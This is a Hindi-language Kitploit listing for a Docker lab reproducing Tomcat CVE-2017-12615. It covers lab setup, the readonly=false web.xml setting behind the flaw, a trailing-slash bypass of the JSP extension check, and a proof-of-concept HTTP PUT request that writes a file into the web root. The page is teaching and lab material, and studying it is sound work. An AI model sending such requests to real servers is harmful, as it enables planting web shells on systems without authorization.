Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Tomcat-CVE-2017-12615 — PUT विधि के माध्यम से Tomcat CVE-2017-12615 मनमाना फ़ाइल लेखन का शोषण करने के लिए Docker-आधारित प्रयोगशाला वातावरण, बाईपास तकनीकों और प्रूफ-ऑफ-कॉन्सेप्ट कोड के साथ। | Kitploit
उपकरण/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

PUT विधि के माध्यम से Tomcat CVE-2017-12615 मनमाना फ़ाइल लेखन का शोषण करने के लिए Docker-आधारित प्रयोगशाला वातावरण, बाईपास तकनीकों और प्रूफ-ऑफ-कॉन्सेप्ट कोड के साथ।

रिपॉजिटरी देखें
16 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PUT विधि के माध्यम से Tomcat मनमानी फ़ाइल-लेखन भेद्यता (CVE-2017-12615)

चीनी संस्करण

Tomcat संस्करण: 8.5.19

पर्यावरण सेटअप

root@kitploit:~
docker-compose build
docker-compose up -d

उपरोक्त कमांड सफलतापूर्वक चलाने के बाद, आप http://your-ip:8080 साइट पर जाकर Tomcat का उदाहरण पृष्ठ देख सकते हैं।

तर्क

संदर्भ लिंक:

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat लेखन अनुमति(readonly=false)सेट करता है, जिसके परिणामस्वरूप हम सर्वर में फ़ाइलें लिख सकते हैं।

root@kitploit:~
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

हालाँकि Tomcat कुछ हद तक फ़ाइल एक्सटेंशन की जाँच करता है(सीधे jsp नहीं लिख सकते), फिर भी हम कुछ फ़ाइल सिस्टम सुविधाओं(जैसे Linux में / का उपयोग) के माध्यम से सीमा को बायपास कर सकते हैं।

POC

निम्नलिखित पैकेट सीधे भेजें और फिर शेल Web रूट निर्देशिका में लिख दिया जाएगा।

root@kitploit:~
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

निम्नानुसार:

टूल डाउनलोड करें